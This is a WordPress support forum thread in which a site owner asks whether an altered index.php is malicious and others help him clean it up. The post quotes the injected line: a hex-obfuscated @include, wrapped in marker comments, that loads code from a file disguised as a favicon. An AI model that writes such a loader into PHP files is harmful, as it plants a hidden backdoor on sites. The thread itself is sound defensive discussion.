index.php altered. Bad or not?

  • petererengstrom

    (@petererengstrom)


    9 years ago

    Extract from index.php:

    <?php
    /*0d02c*/

    @include “\x2fvar/\x77ww/h\x74ml/~\x5f_joo\x6dla-3\x5f_~/p\x6cugin\x73/ext\x65nsio\x6e/fav\x69con_\x36f0ab\x34.ico”;

    /*0d02c*/
    /**
    * Front to the WordPress application. This file doesn’t do anything, but loads
    * wp-blog-header.php which does and tells WordPress to load the theme.
    *
    * @package WordPress
    */

    /**
    * Tells WordPress to load the WordPress theme and output it.
    *
    * @var bool
    */
    define(‘WP_USE_THEMES’, true);

    /** Loads the WordPress Environment and Template */
    require( dirname( __FILE__ ) . ‘/wp-blog-header.php’ );

Viewing 9 replies - 1 through 9 (of 9 total)
  • sinip

    (@sinip)

    9 years ago

    IMHO line @include “\x2fvar/\x77ww/h\x74ml/~\x5f_joo\x6dla-3\x5f_~/p\x6cugin\x73/ext\x65nsio\x6e/fav\x69con_\x36f0ab\x34.ico”; shouldn’t be there.

    Thread Starter petererengstrom

    (@petererengstrom)

    9 years ago

    Hi all!

    The @include line seems to “direct” to my very old and from now deleted folder with an old Joomla installation.

    I guess the of my server, it’s pretty old now, is some kind of hacked from within the by now deleted folder of Joomla.

    I will report my progress here if you don’t mind, and I do understand the competition between WordPress and Joomla.

    // Peter

    sinip

    (@sinip)

    9 years ago

    No probs at all, I have websites in both WP and Joomla! 🙂

    Thread Starter petererengstrom

    (@petererengstrom)

    9 years ago

    Then I guess you have better, stronger, passwords than I 😉 Thank you for responding! I’ve now deleted all kind of old Joomla install here just to be safe. I was blocked by Google for say a month ago so I had to do something to the old server here.

    // Peter

    sinip

    (@sinip)

    9 years ago

    I have those Joomla! websites on different hosting. 🙂 But I had my fair share of Joomla! hacks during the course of time, before I’ve learned few things and installed one addon that sits between the website and MySQL database, sanitizing any kind of SQL injection. 🙂

    Thread Starter petererengstrom

    (@petererengstrom)

    9 years ago

    Please tell here, I’m interested 😉 , or you may email me at peter[at]petereng.com. Anyhow I am pleased of your response.

    // Peter

    Moderator Steven Stern (sterndata)

    (@sterndata)

    Volunteer Forum Moderator

    9 years ago

    Take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

    sinip

    (@sinip)

    9 years ago

    Here it is:

    Marco’s SQL Injection – LFI Interceptor

    Never had a problem since…

    Thread Starter petererengstrom

    (@petererengstrom)

    9 years ago

    Thank you @sinip !

Viewing 9 replies - 1 through 9 (of 9 total)

The topic ‘index.php altered. Bad or not?’ is closed to new replies.